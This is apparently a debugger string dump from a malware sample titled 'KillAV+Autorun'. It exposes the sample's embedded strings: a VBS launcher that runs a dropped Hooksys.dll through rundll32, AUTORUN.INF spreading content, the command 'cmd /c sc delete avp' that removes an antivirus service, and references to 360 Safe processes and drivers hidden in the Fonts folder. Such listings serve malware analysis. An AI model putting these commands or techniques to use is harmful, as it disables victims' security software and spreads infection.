KillAV+Autorun
Ultra String Reference Plugin
Address Disassembly Text String
13141097 push 1314D588 dllSeDebugPrivilege
131410BF push 1314D580 Rkdll
13141100 push 1314D58C SeDebugPrivilege
13141177 push 1314D65C C:\Hooksys.dll
13141196 push 1314D65C C:\Hooksys.dll
131411A0 push 1314D650 CCenter.exeC:\Hooksys.dll
131411DD mov edi, 1314D640 \Fonts\FONT.VBSCCenter.exeC:\Hooksys.dll
131411F1 push 1314D63C w+
13141224 push 1314D608 Set wshshell=wscript.CreateObject("WScript.Shell")\nw+
1314122F push 1314D5D8 wshshell.run "rundll32 C:\Hooksys.dll,RSDK",0
13141252 push 1314D5CC cscript.exewshshell.run "rundll32 C:\Hooksys.dll,RSDK",0
13141257 push 1314D5C4 open
13141285 push 1314D5B0 C:\Hooksys.dll,RSDKopen
1314128A push 1314D5A0 rundll32.exe
1314128F push 1314D5C4 open
13141324 mov edi, 1314D684 \linkinfo.dll
13141352 mov edi, 1314D66C \dllcache\linkinfo.dll
131413C5 push 1314D63C w+
131413DA push 1314D718 [AutoRun]\r\nGRIL.PIF
131413EA push 1314D700 shell\open=打开(&O)\r\n
131413F6 push 1314D6E8 shell\open\Command=%s\r\nshell\open=打开(&O)\r\n
13141402 push 1314D6D0 shell\open\Default=1\r\n
1314140E push 1314D6B0 shell\explore=资源管理器(&X)\r\n
1314141A push 1314D694 shell\explore\command=%s\r\n
1314144B push 1314D5C4 open
13141488 push 1314D740 %c:\GRIL.PIF
1314149B push 1314D730 %c:\AUTORUN.INF%c:\GRIL.PIF
131414AB push 1314D724 GRIL.PIF
13141570 sub esp, 220 (Initial CPU selection)
1314157A push 1314D790 0
1314157F push 1314D788 SSS1
131415BC push 1314D77C AUTORUN.INFSSS1
1314163B push 1314D76C AS21a669aSSE
1314166F push 1314D754 cmd /c sc delete avp
131416AA push 1314D65C C:\Hooksys.dll
13141A99 push 1314D794 lfdl
13141AF4 push 1314D7A4 1
13141AF9 push 1314D790 0
13141B07 push 1314D79C smstss
13141B6E mov edi, 1314D7B8 \fonts\lfdl.sys\\.\NEWYEARG
13141BBF push 1314D7A8 \\.\NEWYEARK
13141C6D mov edi, 1314D7D8 \fonts\smstss.sys
13141CA4 mov edi, 1314D684 \linkinfo.dll
13141D14 push 1314D7C8 \\.\NEWYEARG
13141F70 push 1314D7EC nsg\\.\KKAV
13141FD9 mov edi, 1314D834 \Fonts\nsg.fon
13142021 push 1314D828 360tray.exe\Fonts\nsg.fon
1314202B push 1314D81C 360Safe.exe360tray.exe\Fonts\nsg.fon
13142039 push 1314D80C safeboxTray.exe360Safe.exe360tray.exe\Fonts\nsg.fon
13142047 push 1314D7FC 360safebox.exe
1314206B push 1314D7F0 \\.\KKAV
13142154 push 1314D878 SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
131421A8 push 1314D870 Path
13142220 mov edi, 1314D864 \safemon
1314224B mov edi, 1314D858 \monsafe
13142279 mov edi, 1314D844 \safemon\usp10.dll
131422F7 push 1314D828 360tray.exe\Fonts\nsg.fon |